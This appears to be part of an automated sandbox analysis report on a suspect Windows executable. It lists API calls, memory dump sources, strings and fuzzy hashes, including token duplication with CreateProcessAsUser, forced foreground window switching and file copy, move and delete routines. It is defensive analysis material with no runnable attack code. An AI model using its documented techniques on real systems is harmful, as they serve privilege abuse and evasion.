                                                                                                                  • Instruction ID: 8e443c470cd329b51aa0b2c66eafbe77d500ce91655981cf057e69b52ab9faa9
                                                                                                                  • Opcode Fuzzy Hash: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
                                                                                                                  • Instruction Fuzzy Hash: 34F0C230A00219EBCF11BFB188024DF7B71EF44754F01845BF4205A151C73C8AD1EB99
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __fread_nolock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2638373210-0
                                                                                                                  • Opcode ID: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
                                                                                                                  • Instruction ID: 9e9a42c0c7b58ac35d14f3716b04d6bdbb365f426eb98045716108692e45ddfa
                                                                                                                  • Opcode Fuzzy Hash: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
                                                                                                                  • Instruction Fuzzy Hash: 82F01CB16047045FDB35CA24D941BA3B7E89B4A350F00481EFAAA87342D6B6B845CA99
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wfsopen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 197181222-0
                                                                                                                  • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                  • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                                                                  • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                  • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4275171209-0
                                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                  • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                  • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 02E422B1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062920973.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e40000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3472027048-0
                                                                                                                  • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                  • Instruction ID: 1e4c9de34c22da1ae4bd01e8655972a3df860c3a3ecfe98841d9fbff098e7e8a
                                                                                                                  • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                  • Instruction Fuzzy Hash: 92E0BF7498010EEFDB00EFA4D5496DE7BB4EF04311F1045A1FD05D7680DB309E548A66
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 02E422B1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062920973.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e40000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3472027048-0
                                                                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                  • Instruction ID: 4d7938f6f94a7bf1b962004a40b7ba3c13d95c13c650727589e00a9c40c430bc
                                                                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                  • Instruction Fuzzy Hash: C6E0E67498010EDFDB00EFB4D54969E7FB4EF04301F104161FD05D2280DA309D508A72
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                                                  • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                                                  • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                                                  • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                                                  • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                                                  • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                                                  • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                                                  • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                                                  • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                                                  • SendMessageW.USER32 ref: 0047CA7F
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                                                  • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                                                  • ImageList_SetDragCursorImage.COMCTL32(009750B8,00000000,00000000,00000000), ref: 0047CB9B
                                                                                                                  • ImageList_BeginDrag.COMCTL32(009750B8,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                                                  • SetCapture.USER32(?), ref: 0047CBB6
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                                                  • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                                                  • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                                  • SendMessageW.USER32 ref: 0047CD12
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                                  • SendMessageW.USER32 ref: 0047CD80
                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                                  • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                                  • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                                  • SendMessageW.USER32 ref: 0047CE93
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,02D01B70,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                                  • SendMessageW.USER32 ref: 0047CF6B
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,02D01B70,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                  • String ID: @GUI_DRAGID$F
                                                                                                                  • API String ID: 3100379633-4164748364
                                                                                                                  • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                  • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                                  • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                  • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32 ref: 00434420
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                                  • IsIconic.USER32(?), ref: 0043444F
                                                                                                                  • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                                  • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 2889586943-2988720461
                                                                                                                  • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                  • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                                  • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                  • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                                  APIs
                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                                  • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                                  • _wcslen.LIBCMT ref: 00446498
                                                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                  • _wcsncpy.LIBCMT ref: 004464C0
                                                                                                                  • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                                  • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                                  • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                                  • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                                  • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                                  • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                                  • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                                                  • String ID: $@OH$default$winsta0
                                                                                                                  • API String ID: 3324942560-3791954436
                                                                                                                  • Opcode ID: ab11b74c77e1671f90d490ac2e0a2228ae196153cd0620c59eba62667855e901
                                                                                                                  • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                                                  • Opcode Fuzzy Hash: ab11b74c77e1671f90d490ac2e0a2228ae196153cd0620c59eba62667855e901
                                                                                                                  • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                                                  APIs
                                                                                                                  • _wcslen.LIBCMT ref: 004096C1
                                                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                  • _memmove.LIBCMT ref: 0040970C
                                                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                                                  • _memmove.LIBCMT ref: 00409D96
                                                                                                                  • _memmove.LIBCMT ref: 0040A6C4
                                                                                                                  • _memmove.LIBCMT ref: 004297E5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2383988440-0
                                                                                                                  • Opcode ID: 76c5002a5b08fcb9bb8ba94d95d58e5c4c3d1de4130b5d66d1edbf3569b5fccd
                                                                                                                  • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                                                  • Opcode Fuzzy Hash: 76c5002a5b08fcb9bb8ba94d95d58e5c4c3d1de4130b5d66d1edbf3569b5fccd
                                                                                                                  • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                    • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                                                                    • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                                                                    • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                  • _wcscat.LIBCMT ref: 0044BD94
                                                                                                                  • _wcscat.LIBCMT ref: 0044BDBD
                                                                                                                  • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                                                                  • _wcscpy.LIBCMT ref: 0044BE71
                                                                                                                  • _wcscat.LIBCMT ref: 0044BE83
                                                                                                                  • _wcscat.LIBCMT ref: 0044BE95
                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 2188072990-1173974218
                                                                                                                  • Opcode ID: 7a8d5f8610d379da30b712c8117f4eed38144bb63bbd26685d4741f30de440db
                                                                                                                  • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                                                                  • Opcode Fuzzy Hash: 7a8d5f8610d379da30b712c8117f4eed38144bb63bbd26685d4741f30de440db
                                                                                                                  • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                                  • __swprintf.LIBCMT ref: 004789D3
                                                                                                                  • __swprintf.LIBCMT ref: 00478A1D
                                                                                                                  • __swprintf.LIBCMT ref: 00478A4B
                                                                                                                  • __swprintf.LIBCMT ref: 00478A79
                                                                                                                    • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                                    • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                                                  • __swprintf.LIBCMT ref: 00478AA7
                                                                                                                  • __swprintf.LIBCMT ref: 00478AD5
                                                                                                                  • __swprintf.LIBCMT ref: 00478B03
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                  • API String ID: 999945258-2428617273
                                                                                                                  • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                  • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                                  • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                  • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
